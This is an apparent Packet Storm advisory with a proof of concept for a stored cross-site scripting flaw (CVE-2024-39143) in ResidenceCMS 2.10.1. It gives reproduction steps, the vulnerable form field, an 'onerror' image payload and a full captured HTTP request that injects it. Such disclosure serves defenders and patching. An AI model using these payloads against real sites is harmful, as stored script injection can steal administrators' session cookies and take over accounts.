ResidenceCMS 2.10.1 Cross Site Scripting

Published: 08 Jul 2024 00:00:00
Reported by: Jeremia Geraldi Sihombing
Type: packetstorm
Source: packetstormsecurity.com
Views: 253

ResidenceCMS 2.10.1 Stored Cross-Site Scriptin

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2024-39143 | 30 Jul 2024 06:07 | circl |
| CNNVD | ResidenceCMS Cross-Site Scripting Vulnerability | 2 Jul 2024 00:00 | cnnvd |
| CNVD | ResidenceCMS Cross-Site Scripting Vulnerability | 5 Jul 2024 00:00 | cnvd |
| CVE | CVE-2024-39143 | 2 Jul 2024 00:00 | cve |
| Cvelist | CVE-2024-39143 | 2 Jul 2024 00:00 | cvelist |
| Exploit DB | ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) | 9 Apr 2025 00:00 | exploitdb |
| NVD | CVE-2024-39143 | 2 Jul 2024 14:15 | nvd |
| Positive Technologies | PT-2024-28361 · Unknown · Residencecms | 2 Jul 2024 00:00 | ptsecurity |
| RedhatCVE | CVE-2024-39143 | 9 Jan 2026 09:32 | redhatcve |
| Veracode | Cross-site Scripting (XSS) | 3 Jul 2024 18:21 | veracode |

`# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form  
# Date: 8-7-2024  
# Category: Web Application  
# Exploit Author: Jeremia Geraldi Sihombing  
# Version: 2.10.1  
# Tested on: Windows  
# CVE: CVE-2024-39143  
  
  
Description:  
----------------  
  
A stored cross-site scripting (XSS) vulnerability exists in  
ResidenceCMS 2.10.1 that allows a low-privilege user to create  
malicious property content with HTML inside it, which acts as a  
stored XSS payload. If this property page is visited by anyone,  
including the administrator, the XSS payload will be triggered.  
  
  
  
Steps to reproduce  
-------------------------  
  
1. Log in as a low-privilege user with property edit capability.  
  
2. Create or edit one of the user-owned properties  
(the default property owned by the user can be used).  
  
3. Fill the content form with the XSS payload using the Code View feature.  
Before saving, switch back to the usual view to check whether the HTML  
is rendered.  
  
Vulnerable parameter name: property[property_description][content]  
  
Example Payload: <img src="x" onerror="alert(document.cookie)">  
  
4. After saving the new property content and clicking 'Finish Editing',  
go to the page and see that the XSS is triggered.  
It is possible to trigger the XSS by using any account or even an unauthorized account.  
  
  
Burp Request  
-------------------  
  
POST /en/user/property/7/edit HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1111  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/en/user/property/7/edit  
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Priority: u=1  
  
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg  
`

Vulners record (08 Jul 2024 00:00, current):
Vulners AI Score: 7.1 (High risk)
CVSS 3.1: 5.4
EPSS: 0.00273